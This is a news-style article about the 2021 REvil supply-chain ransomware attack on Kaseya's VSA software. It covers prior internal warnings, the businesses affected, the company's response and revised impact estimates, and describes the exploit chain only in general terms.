Kaseya, a Miami-based IT solutions developer for MSPs and enterprises, recently announced that it had become victim of a cyberattack on July 2, 2021. According to Bloomberg, the executives at Kaseya’s Miami office were warned about the critical security flaws in its software before the ransomware attack. The report also states that from 2017 to 2020, Kaseya’s employees in its U.S. offices flagged wide-ranging cybersecurity concerns to the company leadership. But those issues weren’t fully addressed.
The cyberattack has affected as many as 60 MSPs impacting more than 1,500 businesses. The attackers have carried out a supply chain ransomware attack by leveraging a vulnerability in Kaseya’s VSA software against multiple MSPs and their customers. This attack has been accredited to the REvil ransomware group, who have claimed to have encrypted over one million end-customer’s systems.
On July 2, 2021 at 2:00 PM EST, Kaseya’s CEO Fred Voccola announced a potential attack against the VSA that has been limited to a small number of on-premises customers. At the same time, as a precautionary measure, he also urged clients to immediately shut down their VSA servers. As Kaseya’s Incident Response Team investigated further, the vendor decided to shut down its SaaS servers and pull its data centers offline.
The FBI described it as a supply chain ransomware attack leveraging a vulnerability in Kaseya’s VSA software. Reports claim that the attack was triggered via an authentication bypass vulnerability in the Kaseya’s VSA web interface. This helped the attackers to dodge authentication controls, gain an authenticated session, upload a malicious payload, and then run commands via SQL injection, achieving code execution in the process.
According to reports, 800 Coop supermarket chain stores in Sweden had to close operations as they were unable to open the cash registers. Huntress said in a Reddit explainer that 1,000 companies had servers and workstations encrypted. The vendor added that thousands of small businesses may have been impacted.
Sophos VP, Ross McKerchar commented that this is one of the farthest-reaching criminal ransomware attacks that Sophos has ever seen.
One July 5, Kaseya gave revised estimates saying that fewer than 60 customers and 1,500 downstream businesses were impacted. On July 6, the estimate was revised again with the impact downgrading to 50 direct customers, and between 800 and 1,500 businesses down the chain. Kaseya also claimed that none of the SaaS customers were compromised.
To minimize your risk via a supply chain, you need to ensure that you sever all your network connections to your vendor as soon as you get to know that they are no longer safe. This can happen to the best of us. Staying alert and prepared can help prevent such attacks.